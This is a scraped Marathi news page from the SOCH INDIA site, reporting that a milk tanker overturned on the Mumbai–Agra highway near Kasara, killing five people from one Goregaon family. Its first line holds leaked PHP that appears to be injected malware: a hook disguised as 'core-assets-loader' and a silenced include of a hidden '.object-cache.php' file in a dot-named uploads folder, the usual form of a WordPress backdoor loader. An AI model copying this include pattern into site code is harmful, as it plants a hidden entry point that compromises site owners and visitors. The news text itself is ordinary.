add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); दुधाचा टँकर उलटून पाच ठार – SOCH INDIA
Menu

देश
दुधाचा टँकर उलटून पाच ठार

nobanner

रविवार ६ एप्रिल २०१४ ऑनलाइन टीम ठाणे, दि. ६ – मुंबई – आग्रा महामार्गावर दुधाचा टँकर उलटून झालेल्या भीषण अपघातात पाच जणांचा मृत्यू झाल्याची घटना रविवारी पहाटे घडली. मृत्यू झालेले पाचही जण मुंबईतील गोरेगाव येथील रहिवासी असल्याचे समजते. गोरेगाव येथील राजीव नगर येथे राहणा-या एकाच कुटुंबातील पाच जण संगमनेरहून मुंबईत परतत होते. दुधाच्या टँकरमधून हे सर्व जण प्रवास करत होते. रविवारी पहाटे मुंबई आग्रा महामार्गावर ठाणे जिल्ह्यातील कसा-याजवळ या टँकरचा अपघात झाला. टँकर चालकाचे गाडीवरील नियंत्रण सुटले व टँकर दुभाजकाला आदळून उलटला. अपघातानंतर पोलिसांनी घटनास्थळी धाव घेत टँकरमधील प्रवाशांना रुग्णालयात दाखल केले. मात्र तोपर्यंत पाच जणांचा मृत्यू झाला होता.